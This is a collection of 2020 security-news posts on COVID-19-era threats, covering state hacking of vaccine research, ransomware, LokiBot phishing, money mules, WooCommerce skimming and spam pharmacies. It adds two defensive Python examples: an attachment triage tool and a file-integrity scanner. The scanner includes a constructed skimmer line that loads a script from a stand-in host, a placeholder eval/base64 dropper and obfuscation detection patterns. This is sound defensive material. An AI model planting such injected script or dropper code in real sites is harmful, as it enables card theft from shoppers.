“These actors have been observed attempting to identify and illicitly obtain valuable intellectual property and public health data related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research,” reads a statement from the FBI and the CISA.

“China’s efforts to target these sectors pose a significant threat to our nation’s response to COVID-19.”

The US agencies recommend targeted organizations to adopt cybersecurity best practices to prevent state-sponsored hackers from stealing COVID-19-related material.

“What else is new with China? What else is new? Tell me. I’m not happy with China,” President Trump commented. “We’re watching it very closely.”

“China’s long history of bad behavior in cyberspace is well documented, so it shouldn’t surprise anyone they are going after the critical organizations involved in the nation’s response to the Covid-19 pandemic,” said Christopher Krebs, the director of the Cybersecurity and Infrastructure Security Agency. He added that the agency would “defend our interests aggressively.”

The Chinese government in Beijing rejected the allegation on Monday.

“We are leading the world in COVID-19 treatment and vaccine research. It is immoral to target China with rumors and slanders in the absence of any evidence,” Foreign Affairs ministry spokesman Zhao Lijian said.

The Chinese government is not the only one interested in COVID-19 research; nation-state hackers from Russia, Iran, and North Korea are launching spear-phishing and misinformation campaigns in an attempt to target organizations and scientists involved in vaccine research.

Last week the US and the UK issued a joint alert to warn of the rise in cyber attacks carried out by foreign states against healthcare organizations and researchers.

This is my interview on the topic at TRT World

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post China-linked hackers are attempting to steal COVID-19 Vaccine Research appeared first on Security Affairs.

Magellan Health Ransomware Attack Exposes Customer Data

In the wake of an April ransomware attack, Fortune 500 healthcare company Magellan Health announced that a hacker exfiltrated customer data.

The ransomware attack was first detected by Magellan Health April 11, 2020, and was traced back to a phishing email that had been sent and opened five days earlier. Subsequent investigation revealed that customer data had been exfiltrated prior to the deployment of the ransomware.

“The exfiltrated records include personal information such as name, address, employee ID number, and W-2 or 1099 details such as Social Security number or Taxpayer ID number and, in limited circumstances, may also include usernames and passwords,” stated the company in a letter sent to affected individuals.

This incident comes months after the company announced several of its subsidiaries had been targeted by phishing attacks that resulted in the compromise of the health information of more than 55,000 members.

 

The post Magellan Health Ransomware Attack Exposes Customer Data appeared first on Adam Levin.

Smashing Security #178: Office pranks, meat dresses, and robocop dogs

Graham shares stories of email storms, Carole describes the steps being taken by firms as they try to coax employees back to the office, and special guest Lisa Forte details a hack that has impacted Lady Gaga and other celebrities.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast with computer security veterans Graham Cluley and Carole Theriault.

Crooks continue to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

Microsoft has discovered a new COVID-19 themed phishing campaign targeting businesses with the LokiBot Trojan.

LokiBot had already been used in Coronavirus-themed campaigns: in early April, security experts at FortiGuard Labs discovered phishing attacks using alleged messages from the World Health Organization (WHO) to deliver the LokiBot trojan.

The COVID-19 themed phishing campaigns recently observed by Microsoft were using messages with subject lines like “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020.”

The LokiBot data stealer is able to collect information from tens of different web browsers, access browsing data, locate the credentials for more than 15 different email and file transfer clients, and check for the presence of popular remote admin tools such as SSH, VNC and RDP.

One of the phishing campaigns observed by Microsoft sees attackers pretending to be from the Centers for Disease Control (CDC); the messages promise the latest information on the COVID-19 pandemic and a new “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020”.

Another campaign uses messages that pretend to be from a vendor asking for updated banking information to process payments during the COVID-19 lockdown.

The emails in both campaigns use ARJ attachments that contain malicious executables disguised as PDF files.

The choice of password-protected ARJ files aims to bypass some security solutions, since the gateway cannot inspect the encrypted contents. Once the enclosed file is opened, the infection chain starts and ultimately delivers the LokiBot Trojan.
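The two tricks described above (an archive container the gateway cannot look inside, and an executable carrying a document-like name) are both visible before any detonation if the gateway looks at file content rather than file names. The following is an added example written for this page, not Microsoft's or any vendor's tooling: it triages attachments by their leading bytes, flags ARJ containers and the ARJ header flag that marks a password-protected archive, and catches a PE executable presented as a PDF, whether as a direct attachment or as a member of an archive that could be opened. The sample attachments, including the minimal ARJ header bytes, are constructed; the extension lists are an assumption to be tuned for a given mail environment.

```python
"""Mail-attachment triage for the lure described above.  Added example, not
Microsoft's or LokiBot-specific tooling; sample attachments are constructed."""
import re
from typing import Dict, List, Optional, Tuple

# Container signatures (first bytes of the file), checked regardless of the name.
ARCHIVE_MAGICS: Dict[bytes, str] = {
    b"\x60\xea": "arj",
    b"PK\x03\x04": "zip",
    b"Rar!\x1a\x07": "rar",
    b"7z\xbc\xaf\x27\x1c": "7z",
}
PE_MAGIC = b"MZ"          # Windows executable
PDF_MAGIC = b"%PDF"
ARJ_GARBLED_FLAG = 0x01   # ARJ main-header flag bit: archive is password-protected

# A document extension followed by an executable extension, e.g. plan.pdf.exe
# (assumption: list of extensions to be tuned per environment).
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png)\.(exe|scr|com|pif|bat|cmd|js|vbs)$", re.I)


def sniff_archive(head: bytes) -> Optional[str]:
    """Return the container type implied by the leading bytes, or None."""
    for magic, kind in ARCHIVE_MAGICS.items():
        if head.startswith(magic):
            return kind
    return None


def arj_is_password_protected(head: bytes) -> bool:
    # ARJ main header layout: magic(2) header_size(2) first_hdr_size(1)
    # version(1) min_version(1) host_os(1) flags(1) ...; the GARBLED bit in
    # the flags byte (offset 8) marks an encrypted archive.
    return head.startswith(b"\x60\xea") and len(head) > 8 and bool(head[8] & ARJ_GARBLED_FLAG)


def triage_file(name: str, head: bytes) -> List[str]:
    """Reasons to hold one file (a direct attachment or an extracted member)."""
    reasons: List[str] = []
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    kind = sniff_archive(head)
    if kind and kind != ext:
        reasons.append(f"content is a {kind} archive but the name says .{ext or '(none)'}")
    if kind == "arj":
        reasons.append("ARJ archive attachment (uncommon container in business mail)")
        if arj_is_password_protected(head):
            reasons.append("password-protected ARJ: members cannot be inspected by the gateway")
    if ext == "pdf" and not head.startswith(PDF_MAGIC):
        what = "a PE executable" if head.startswith(PE_MAGIC) else "not a PDF"
        reasons.append(f"named .pdf but the content is {what}")
    if DOUBLE_EXT.search(name):
        reasons.append("double extension hides an executable type")
    return reasons


def triage_attachment(name: str, head: bytes,
                      members: Tuple[Tuple[str, bytes], ...] = ()) -> List[str]:
    """Triage an attachment and, when the archive could be opened, its members."""
    reasons = triage_file(name, head)
    for member_name, member_head in members:
        for reason in triage_file(member_name, member_head):
            reasons.append(f"{name} -> {member_name}: {reason}")
    return reasons


# Constructed samples.  The ARJ bytes are a minimal main header only, with the
# GARBLED flag set; they are not a complete archive.
ARJ_HEADER_PROTECTED = bytes([0x60, 0xEA, 0x22, 0x00, 0x1E, 0x0B, 0x01, 0x00,
                              0x01, 0x02, 0x02, 0x00])
SAMPLE_ATTACHMENTS = [
    ("quarterly-report.pdf", b"%PDF-1.4\n%...", ()),
    ("BUSINESS_CONTINUITY_PLAN.arj", ARJ_HEADER_PROTECTED, ()),
    ("covid19-update.pdf.exe", b"MZ\x90\x00\x03\x00", ()),
    ("invoice.zip", b"PK\x03\x04\x14\x00", (("invoice.pdf", b"MZ\x90\x00"),)),
]


def triage_all(attachments=SAMPLE_ATTACHMENTS) -> Dict[str, List[str]]:
    """Map each attachment name to the list of reasons it should be held."""
    return {name: triage_attachment(name, head, members) for name, head, members in attachments}


if __name__ == "__main__":
    for name, reasons in triage_all().items():
        print(name, "->", reasons or ["ok"])
```

Only the clean PDF passes; the password-protected ARJ is held even though nothing inside it can be read, which is the right outcome for a container that blocks inspection, and the ZIP is held because of what was found inside it, not because of its own name.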

Microsoft pointed out that the machine learning algorithms in Microsoft Threat Protection were able to detect the campaign, and that Microsoft Defender users are automatically protected.

“Microsoft Defender’s advanced detection technologies, including behavior learning and machine learning, started blocking this attack right away. We used deeper analysis of the blocked attacks, which helped us to identify the end-to-end campaign detailed,” Tanmay Ganacharya, director of security research of Microsoft Threat Protection, told BleepingComputer.

“We see a lot of benefits of leveraging machine learning and we are in a very unique position here at Microsoft because of the quality and diversity of our 8.2 trillion signals we process daily through the Microsoft Intelligent Security Graph.” 

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Crooks continue to use COVID-19 lures, Microsoft warns appeared first on Security Affairs.

COVID-19 Scam Roundup – May 11, 2020

Digital attacks continue to exploit coronavirus 2019 (COVID-19) as part of their malicious operations. On May 5, 2020, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) along with the United Kingdom’s National Cyber Security Centre (NCSC) published a joint alert in which they revealed that they had witnessed APT actors targeting […]

The post COVID-19 Scam Roundup – May 11, 2020 appeared first on The State of Security.

Maze Ransomware Targets the Hospitals and Labs Fighting Coronavirus

“Never let a good crisis go to waste.” These wise words have been recently attributed to former Bill Clinton Chief of Staff Rahm Emanuel, though Freakonomics actually dates it back to 1976 and a completely different context. Regardless of who first uttered the phrase or some permutation of it, modern-day cybercriminals have taken the candid […]

The post Maze Ransomware Targets the Hospitals and Labs Fighting Coronavirus appeared first on The State of Security.

COVID-19 Scam Roundup – May 4, 2020

Malicious actors continue to abuse coronavirus 2019 (COVID-19) as a lure to profit off of innocent people. Indeed, Arkose Labs found that 26.5% of all transactions recorded in Q1 2020 were fraud and abuse attempts—a 20% increase over the previous quarter and the highest attack rate ever observed by the security firm’s researchers. It’s therefore […]

The post COVID-19 Scam Roundup – May 4, 2020 appeared first on The State of Security.

Cybercriminals Are Exploiting the Covid-19 Pandemic

Cybercriminals are actively targeting Covid-19 hotspots with malware and phishing campaigns, according to a new report from Bitdefender.

The report, “Coronavirus-themed Threat Reports Haven’t Flattened the Curve,” shows a direct correlation between confirmed Covid-19 cases and malware attacks exploiting the crisis.

These findings confirm a similar report that showed a 30000% increase in Covid-19-themed attacks from January to March.

“Countries that have reported the largest number of Coronavirus-themed [scams] seem to have also been those hit hardest by the pandemic,” the report stated, showing a concurrent increase in both confirmed cases and malware attacks in South Africa in April as an example.

Data from the Bitdefender report also indicated a connection between the availability of Covid-19 testing in an area and an increase in phishing campaigns there.

“[W]e can safely infer that people who get tested are interested in learning more about potential treatments, medicine, medical best practices, and maybe even other patients’ experiences… those spending more time online looking for information about COVID-19 are more likely to fall prey to scams and malware related to Coronavirus,” the report stated. “Receiving an email claiming to have new and interesting information about the pandemic with more exclusive information embedded within the attachment is the perfect lure.”


The post Cybercriminals Are Exploiting the Covid-19 Pandemic appeared first on Adam Levin.

How Cybercriminals are Weathering COVID-19

In many ways, the COVID-19 pandemic has been a boon to cybercriminals: With unprecedented numbers of people working from home and anxious for news about the virus outbreak, it’s hard to imagine a more target-rich environment for phishers, scammers and malware purveyors. In addition, many crooks are finding the outbreak has helped them better market their cybercriminal wares and services. But it’s not all good news: The Coronavirus also has driven up costs and disrupted key supply lines for many cybercriminals. Here’s a look at how they’re adjusting to these new realities.

FUELED BY MULES

One of the more common and perennial cybercriminal schemes is “reshipping fraud,” wherein crooks buy pricey consumer goods online using stolen credit card data and then enlist others to help them collect or resell the merchandise.

Most online retailers years ago stopped shipping to regions of the world most frequently associated with credit card fraud, including Eastern Europe, North Africa, and Russia. These restrictions have created a burgeoning underground market for reshipping scams, which rely on willing or unwitting residents in the United States and Europe — derisively referred to as “reshipping mules” — to receive and relay high-dollar stolen goods to crooks living in the embargoed areas.

A screen shot from a user account at “Snowden,” a long-running reshipping mule service.

But apparently a number of criminal reshipping services are reporting difficulties due to the increased wait time when calling FedEx or UPS (to divert carded goods that merchants end up shipping to the cardholder’s address instead of to the mule’s). In response, these operations are raising their prices and warning of longer shipping times, which in turn could hamper the activities of other actors who depend on those services.

That’s according to Intel 471, a cyber intelligence company that closely monitors hundreds of online crime forums. In a report published today, the company said since late March 2020 it has observed several crooks complaining about COVID-19 interfering with the daily activities of their various money mules (people hired to help launder the proceeds of cybercrime).

“One Russian-speaking actor running a fraud network complained about their subordinates (“money mules”) in Italy, Spain and other countries being unable to withdraw funds, since they currently were afraid to leave their homes,” Intel 471 observed. “Also some actors have reported that banks’ customer-support lines are being overloaded, making it difficult for fraudsters to call them for social-engineering activities (such as changing account ownership, raising withdrawal limits, etc).”

Still, every dark cloud has a silver lining: Intel 471 noted many cybercriminals appear optimistic that the impending global economic recession (and resultant unemployment) “will make it easier to recruit low-level accomplices such as money mules.”

Alex Holden, founder and CTO of Hold Security, agreed. He said while the Coronavirus has forced reshipping operators to make painful shifts in several parts of their business, the overall market for available mules has never looked brighter.

“Reshipping is way up right now, but there are some complications,” he said.

For example, reshipping scams have over the years become easier for both reshipping mule operators and the mules themselves. Many reshipping mules are understandably concerned about receiving stolen goods at their home and risking a visit from the local police. But increasingly, mules have been instructed to retrieve carded items from third-party locations.

“The mules don’t have to receive stolen goods directly at home anymore,” Holden said. “They can pick them up at Walgreens, Hotel lobbies, etc. There are a ton of reshipment tricks out there.”

But many of those tricks got broken with the emergence of COVID-19 and social distancing norms. In response, more mule recruiters are asking their hires to do things like reselling goods shipped to their homes on platforms like eBay and Amazon.

“Reshipping definitely has become more complicated,” Holden said. “Not every mule will run 10 times a day to the post office, and some will let the goods sit by the mailbox for days. But on the whole, mules are more compliant these days.”

GIVE AND TAKE

KrebsOnSecurity recently came to a similar conclusion: Last month’s story, “Coronavirus Widens the Money Mule Pool,” looked at one money mule operation that had ensnared dozens of mules with phony job offers in a very short period of time. Incidentally, the fake charity behind that scheme — which promised to raise money for Coronavirus victims — has since closed up shop and apparently re-branded itself as the Tessaris Foundation.

Charitable cybercriminal endeavors were the subject of a report released this week by cyber intel firm Digital Shadows, which looked at various ways computer crooks are promoting themselves and their hacking services using COVID-19 themed discounts and giveaways.

Like many commercials on television these days, such offers obliquely or directly reference the economic hardships wrought by the virus outbreak as a way of connecting on an emotional level with potential customers.

“The illusion of philanthropy recedes further when you consider the benefits to the threat actors giving away goods and services,” the report notes. “These donors receive a massive boost to their reputation on the forum. In the future, they may be perceived as individuals willing to contribute to forum life, and the giveaways help establish a track record of credibility.”

Brian’s Club — one of the underground’s largest bazaars for selling stolen credit card data and one that has misappropriated this author’s likeness and name in its advertising — recently began offering “pandemic support” in the form of discounts for its most loyal customers.

It stands to reason that the virus outbreak might depress cybercriminal demand for “dumps,” or stolen account data that can be used to create physical counterfeit credit cards. After all, dumps are mainly used to buy high-priced items from electronics stores and other outlets that may not even be open now thanks to the widespread closures from the pandemic.

If that were the case, we’d also expect to see dumps prices fall significantly across the cybercrime economy. But so far, those price changes simply haven’t materialized, says Gemini Advisory, a New York based company that monitors the sale of stolen credit card data across dozens of stores in the cybercrime underground.

Stas Alforov, Gemini’s director of research and development, said there’s been no notable dramatic changes in pricing for both dumps and card data stolen from online merchants (a.k.a. “CVVs”) — even though many cybercrime groups appear to be massively shifting their operations toward targeting online merchants and their customers.

“Usually, the huge spikes upward or downward during a short period is reflected by a large addition of cheap records that drive the median price change,” Alforov said, referring to the small and temporary price deviations depicted in the graph above.

Intel 471 said it came to a similar conclusion.

“You might have thought carding activity, to include support aspects such as checker services, would decrease due to both the global lockdown and threat actors being infected with COVID-19,” the company said. “We’ve even seen some actors suggest as much across some shops, but the reality is there have been no observations of major changes.”

CONSCIENCE VS. COMMERCE

Interestingly, the Coronavirus appears to have prompted discussion on a topic that seldom comes up in cybercrime communities — i.e., the moral and ethical ramifications of their work. Specifically, there seems to be much talk these days about the potential karmic consequences of cashing in on the misery wrought by a global pandemic.

For example, Digital Shadows said some have started to question the morality of targeting healthcare providers, or collecting funds in the name of Coronavirus causes and then pocketing the money.

“One post on the gated Russian-language cybercriminal forum Korovka laid bare the question of threat actors’ moral obligation,” the company wrote. “A user initiated a thread to canvass opinion on the feasibility of faking a charitable cause and collecting donations. They added that while they recognized that such a plan was ‘cruel,’ they found themselves in an ‘extremely difficult financial situation.’ Responses to the proposal were mixed, with one forum user calling the plan ‘amoral,’ and another pointing out that cybercrime is inherently an immoral affair.”

What E-Commerce Sites Can Learn from the Covid-19 Pandemic

For the last few years, cybersecurity experts have been sounding the alarm on something called e-skimming. In this kind of attack, hackers intercept payment card data and personal information from e-commerce sites by exploiting the architectural complexity of those e-commerce sites. 

While there have been several major breaches that were the result of e-skimming, including Macy’s and British Airways, the bulk of these hacking campaigns have been attributed to an individual or a group of hackers called Magecart. S/he or they usually target the Magento platform, often by injecting rogue code into outdated plugins and extensions for websites.

Magento isn’t the Covid moment here. E-skimming is. 

Enter WooCommerce 

Security researchers discovered what could be a game changer in e-skimming attacks earlier this month, one that exponentially expands our collective attackable surface.

Magento has about a 12% market share and represents less than 1% of the entire assemblage of code that comprises the Internet. 

The discovery I mentioned is that a new e-skimming hack has been targeting WooCommerce, which is a far more ubiquitous online shopping plugin used in 26% of all e-commerce sites. WooCommerce is native to and powered by WordPress, a platform that represents over 35% of websites currently online. It would be hard to find a larger attackable surface on the Internet.

The threat posed by a hack targeting WooCommerce isn’t bad only because of the technology’s ubiquity. The issue has to do with who uses it. The quick answer is: Anyone. Contrast that with Magento, which is designed for enterprise-level sites that have detailed inventory needs and other layers of complexity. Magento requires installation, development, and maintenance by trained web professionals certified by the company to understand its many nuances. 

WooCommerce, on the other hand, is easy to use and install; a user with little to no experience building websites—and even less knowledge of cybersecurity best practices—can use it to get an e-commerce site up and running with ease. 

This would be a bad situation in normal times, but with the Covid-19 pandemic making many businesses more reliant on e-commerce and virtual transactions, the potential for an increase in poorly secured websites built on the fly is a matter for concern. 

That said, the bigger issue may be the nature of the hack itself. While e-skimming attacks have usually involved the compromise of vulnerable third-party software, this attack injects malicious code into WooCommerce’s own core files, which makes it much harder to detect, particularly for non-expert site builders.

“With credit card swipers it’s common for attackers to simply include/append malicious javascript from a third-party website,” said Sucuri researcher Ben Martin, who first wrote about the attack. “The fact that the malware lodged itself within an already existing and legitimate file makes it a bit harder to detect.”

There are parallels with the early days of the Covid-19 pandemic. A relatively familiar threat has surfaced in a more dangerous form that is harder to detect and has the potential to impact a significantly larger number of victims. 

Like Covid-19 in January, the current WooCommerce hack is a nascent threat, but unlike the virus, you can prepare for the threat and mitigate the potential damage. 

A good place to start is for businesses and consumers to use a system I call the 3 Ms:

Minimize the Threat: Businesses doing e-commerce need to keep their website and security software up-to-date. Those companies that have the technical know-how should run regular scans for the presence of rogue code on their websites. If they don’t have that resource in house, they would be well advised to hire a cybersecurity expert to do it for them. Most important is to practice good data hygiene, especially when relying on a remote workforce. A single login and password hooked by a phishing email could provide hackers with the necessary credentials to compromise a website, as well as its customer and payment data. 

When making payments online, consumers should use credit cards instead of debit/bank cards, which can provide hackers a direct conduit to their bank accounts.

Monitor Accounts: Keep track of your bank and credit card accounts to know as quickly as possible when something isn’t right. The most effective way to do this is to sign up for transaction monitoring—offered for free by banks, credit unions and credit card companies— which notifies you of any activity in your credit or bank accounts.

Manage the Damage: If a business falls prey to an e-skimming campaign, it’s crucial to act as quickly as possible to alert the authorities, notify consumers and identify the source of the hack. Customers affected by an e-skimming breach should immediately contact their payment card companies, request new cards, and lock down any potentially impacted accounts.
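The Sucuri observation above (skimmer code lodged inside an existing, legitimate file rather than pulled in from a third-party site) and the advice under Minimize the Threat to run regular scans for rogue code both come down to the same thing: knowing what a shipped file looked like before anyone touched it. The following is an added example written for this page, not Sucuri's, WooCommerce's or the author's code. It records a SHA-256 baseline of a plugin tree at install time, diffs the live tree against it, and looks for obfuscation or off-site script loads only in files that were added or changed, so a legitimate file that has grown a few extra lines stands out. The directory layout, file contents, the injected snippet, the `example.invalid` host and the pattern list are all constructed assumptions for the demo, to be tuned per site.

```python
"""Baseline-and-diff integrity check for an e-commerce plugin tree.  Added
example (not Sucuri's, WooCommerce's or the post author's code); the directory
layout, file contents and injected snippet are constructed for the demo."""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List

SCANNED_SUFFIXES = {".php", ".js"}

# Illustrative heuristics applied only to files that changed since the
# baseline (assumption: a site owner tunes these; not a vendor signature set).
SUSPICIOUS_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"\batob\s*\("),
    re.compile(r"String\.fromCharCode"),
    re.compile(r"base64_decode\s*\("),
    re.compile(r"""src\s*=\s*['"]https?://"""),   # script loaded from another host
]


def hash_tree(root: Path) -> Dict[str, str]:
    """Relative path -> SHA-256 hex digest of every PHP/JS file under root."""
    digests: Dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in SCANNED_SUFFIXES:
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_baseline(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Files that appeared, disappeared, or changed content since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def suspicious_lines(text: str) -> List[str]:
    """Line-numbered lines matching any of the illustrative patterns."""
    return [f"{n}: {line.strip()}" for n, line in enumerate(text.splitlines(), 1)
            if any(p.search(line) for p in SUSPICIOUS_PATTERNS)]


def scan(root: Path, baseline: Dict[str, str]) -> dict:
    """Diff the live tree against the baseline; inspect only changed files."""
    report: dict = diff_baseline(baseline, hash_tree(root))
    report["indicators"] = {}
    for rel in report["added"] + report["modified"]:
        hits = suspicious_lines((root / rel).read_text(errors="replace"))
        if hits:
            report["indicators"][rel] = hits
    return report


# Constructed contents.  CHECKOUT_JS stands in for a legitimate shipped asset;
# INJECTED_JS mimics the pattern in the Sucuri quote (code appended to that
# legitimate file, pulling a script from an outside host; example.invalid is a
# reserved name, not a real indicator); DROPPED_PHP is a new file with a
# textbook obfuscation wrapper and a constructed placeholder payload.
CHECKOUT_JS = "jQuery(function ($) { $('form.checkout').on('submit', validateCheckout); });\n"
INJECTED_JS = ("var s=document.createElement('script');"
               "s.src='https://example.invalid/c.js';document.head.appendChild(s);\n")
DROPPED_PHP = "<?php eval(base64_decode('...constructed placeholder...'));\n"


def demo() -> Dict[str, dict]:
    """Baseline a clean tree, then re-scan after the constructed compromise."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        checkout = root / "woocommerce/assets/js/frontend/checkout.js"
        checkout.parent.mkdir(parents=True)
        checkout.write_text(CHECKOUT_JS)
        (root / "woocommerce/woocommerce.php").write_text("<?php // plugin bootstrap (constructed)\n")
        baseline = hash_tree(root)                         # record this at install/update time
        before = scan(root, baseline)
        checkout.write_text(CHECKOUT_JS + INJECTED_JS)     # skimmer appended to a real file
        dropped = root / "woocommerce/includes/wc-constructed-dropper.php"   # hypothetical name
        dropped.parent.mkdir(parents=True)
        dropped.write_text(DROPPED_PHP)
        after = scan(root, baseline)
    return {"before": before, "after": after}


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

The baseline is the part that matters: without it, the modified `checkout.js` is indistinguishable from a legitimate update, which is exactly why the Sucuri quote calls this variant harder to detect. In practice the baseline is taken from a fresh copy of the plugin at the installed version and re-recorded after every intentional update, and the scan runs on a schedule with the report going somewhere an attacker editing the web root cannot alter.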

Malware and viruses are opportunistic. With more businesses relying on e-commerce to make up for shuttered physical storefronts, newly remote workers struggling to secure their home offices from cyberthreats, and more customers using e-tailers for their day-to-day shopping, the circumstances are ideal for a new strain of malware to spread. 

The post What E-Commerce Sites Can Learn from the Covid-19 Pandemic appeared first on Adam Levin.

Unproven Coronavirus Therapy Proves Cash Cow for Shadow Pharmacies

Many of the same shadowy organizations that pay people to promote male erectile dysfunction drugs via spam and hacked websites recently have enjoyed a surge in demand for medicines used to fight malaria, lupus and arthritis, thanks largely to unfounded suggestions that these therapies can help combat the COVID-19 pandemic.

A review of the sales figures from some of the top pharmacy affiliate programs suggests sales of drugs containing hydroxychloroquine rivaled that of their primary product — generic Viagra and Cialis — and that this as-yet-unproven Coronavirus treatment accounted for as much as 25 to 30 percent of all sales over the past month.

A Google Trends graph depicting the incidence of Web searches for “chloroquine” over the past 90 days.

KrebsOnSecurity reviewed a number of the most popular online pharmacy enterprises, in part by turning to some of the same accounts at these invite-only affiliate programs I relied upon for researching my 2014 book, Spam Nation: The Inside Story of Organized Cybercrime, from Global Epidemic to Your Front Door.

Many of these affiliate programs — going by names such as EvaPharmacy, Rx-Partners and Mailien/Alientarget — have been around for more than a decade, and were major, early catalysts for the creation of large-scale botnets and malicious software designed to enslave computers for the sending of junk email.

Their products do not require a prescription, are largely sourced directly from pharmaceutical production facilities in India and China, and are shipped via international parcel post to customers around the world.

In mid-March, two influential figures, President Trump and Tesla CEO Elon Musk, began suggesting that hydroxychloroquine should be more strongly considered as a treatment for COVID-19.

The pharmacy affiliate programs immediately took notice of a major moneymaking opportunity, noting that keyword searches for terms related to chloroquine suddenly were many times more popular than for the other mainstays of their business.

“Everyone is hysterical,” wrote one member of the Russian language affiliate forum gofuckbiz[.]com on Mar. 17. “Time to make extra money. Do any [pharmacy affiliate] programs sell drugs for Coronavirus or flu?”

The larger affiliate programs quickly pounced on the opportunity, which turned out to be a major — albeit short-lived — moneymaker. Below is a screenshot of the overall product sales statistics for the previous 30 days from all affiliates of PharmCash. As we can see, Aralen — a chloroquine drug used to treat and prevent malaria — was the third biggest seller behind Viagra and Cialis.

Recent 30-day sales figures from the pharmacy affiliate program PharmCash.

In mid-March, the affiliate program Rx-Partners saw a huge spike in demand for Aralen and other drugs containing chloroquine phosphate, and began encouraging affiliates to promote a new set of product teasers targeting people anxiously seeking remedies for COVID-19.

Their main promotion page — still online at about-coronavirus2019[.]com — touts the potential of Aralen, generic hydroxychloroquine, and generic Kaletra/Lopinavir, a drug used to treat HIV/AIDS.

An ad promoting various unproven remedies for COVID-19, from the pharmacy affiliate program Rx-Partners.

On Mar. 18, a manager for Rx-Partners said that like PharmCash, drugs which included chloroquine phosphate had already risen to the top of sales for non-erectile dysfunction drugs across the program.

But the boost in sales from the global chloroquine frenzy would be short-lived. Demand for chloroquine phosphate became so acute worldwide that India — the world’s largest producer of hydroxychloroquine — announced it would ban exports of the drug. On Mar. 25, India also began shutting down its major international shipping ports, leaving the pharmacy affiliate programs scrambling to source their products from other countries.

A Mar. 31 message to affiliates working with the Union Pharm program, noting that supplies of Aralen had dried up due to the shipping closures in India.

India recently said it would resume exports of the drug, and judging from recent posts at the aforementioned affiliate site gofuckbiz[.]com, denizens of various pharmacy affiliate programs are anxiously awaiting news of exactly when shipments of chloroquine drugs will continue.

“As soon as India opens and starts mail, then we will start everything, so get ready,” wrote one of Rx-Partners’ senior recruiters. “I am sure that there will still be demand for pills.”

Global demand for these pills, combined with India’s recent ban on exports, has conspired to create shortages of the drug for patients who rely on it to treat chronic autoimmune diseases, including lupus and rheumatoid arthritis.

While hydroxychloroquine has long been considered a relatively safe drug, some people have been so anxious to secure their own stash of the drug that they’ve turned to unorthodox sources.

On March 19, Fox News ran a story about how demand for hydroxychloroquine had driven up prices on eBay for bottles of chloroquine phosphate designed for removing parasites from fish tanks. A week later, an Arizona man died and his wife was hospitalized after the couple ingested one such fish tank product in hopes of girding their immune systems against the Coronavirus.

Despite many claims that hydroxychloroquine can be effective at fighting COVID-19, there is little real data showing how it benefits patients stricken with the disease. The largest test of the drug’s efficacy against Coronavirus showed no benefit in a large analysis of its use in U.S. veterans hospitals. On the contrary, there were more deaths among those given hydroxychloroquine versus standard care, researchers reported.

In an advisory released today, the U.S. Food and Drug Administration (FDA) cautioned against use of hydroxychloroquine or chloroquine for COVID-19 outside of the hospital setting or a clinical trial due to risk of heart rhythm problems.

Rethinking Zoom? How WebEx, Teams, and Google Meet and Duo Compare on Privacy and Security

If you’re among the many looking for a new video conferencing tool after adding “zoombombing” to your vocabulary, you’re in luck. While a one-size-fits-all solution doesn’t exist, there are many other options with proven security features. Here’s a roundup of some of Zoom’s competitors and their privacy and security features.

Webex

The Webex video conference platform has been around since 1995 and is a favorite of the privacy-conscious health care, information technology, and financial services industries. This is partially due to the fact that all three industries commonly relied on virtual meetings well before the Covid-19 pandemic, but mostly because Webex has a reputation for maintaining robust cybersecurity. Cisco, its parent company, is an industry leader in network hardware, software, and security products.

Webex offers end-to-end encryption. Using it, however, limits popular video options, including remote computer sharing and personal meeting rooms. Worth noting: Webex and Cisco products have had security issues in the past.

Microsoft Teams

Like Zoom, Microsoft Teams experienced an uptick in the recent crisis, in part due to its integration with the company’s flagship Office365 cloud and productivity services. Microsoft says that Teams is encrypted “in transit and at rest,” but details about support for end-to-end encryption are vague.

Like Webex, one advantage of Teams is that its parent company is a major provider of networking, software, and cybersecurity services. Microsoft has an internal rating system for the security of its products, and has designated Teams to be Tier-D compliant, which means that it can adhere to the strictest government and industry security standards and legal requirements.

Neither Microsoft nor Teams is immune to security vulnerabilities, but as a company, Microsoft’s bandwidth to address them when they occur is probably unparalleled. Microsoft also has a more transparent privacy policy and a better track record when it comes to protecting user and customer data than many of its competitors, including Zoom.

Google Hangouts/Google Duo

Google offers Hangouts and Duo as its two primary video meeting platforms; both offer “free” and paid versions bundled in with its G Suite line of applications. While Google Hangouts offers similar functionality to Zoom, it has a limit of 25 attendees per video conference. Other considerations include a long history of security and privacy concerns and the fact that Google Hangouts doesn’t offer end-to-end encryption.

Duo is end-to-end encrypted, and can support video meetings with up to 12 attendees.

Like Cisco and Microsoft, Google has more resources dedicated to cybersecurity, but the company has a lengthy track record of mining user data, especially for “free” services. The company is also notorious for quickly and unceremoniously dropping support for many of its projects, and has done so with several previous video conferencing and meeting apps.

Is Zoom Worth Sticking With?

It depends on your business needs. Zoom’s rapid increase in popularity in an already crowded market is a testament to its many qualities, features, and ease of use.

The company has made some misleading claims about user privacy and data, and the recent discovery of multiple serious security vulnerabilities will test the company’s ability to support and sustain its user base.

A good sign is that Zoom announced a 90-day freeze on any new features so it can focus on security and privacy issues. This move could help the platform and the company to continue the meteoric rise in the number of people using the service.

